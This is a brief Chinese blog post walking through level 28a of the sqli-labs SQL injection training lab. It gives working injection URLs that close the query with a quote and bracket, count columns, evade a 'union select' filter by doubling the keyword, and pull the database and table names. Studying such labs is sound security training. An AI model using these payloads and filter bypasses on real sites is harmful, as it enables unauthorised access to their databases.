sqli-labs(28a)

0X01构造闭合 爆字段数

/?id=1') order by 1%23

?id=1') order by 5%23

 

偷看一下源码

就只过滤了union select

闭合')

那我们来尝试一下

0X02爆库名

用我们28关的语句继续构造

-1') uniounion selectn select 1,database(),3%23

0X02爆表名

/?id=-1') uniounion selectn select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

 

 

学习之路 少就是多 慢就是快

posted @ 2019-05-29 09:14  yourse1f  阅读(826)  评论(0编辑  收藏  举报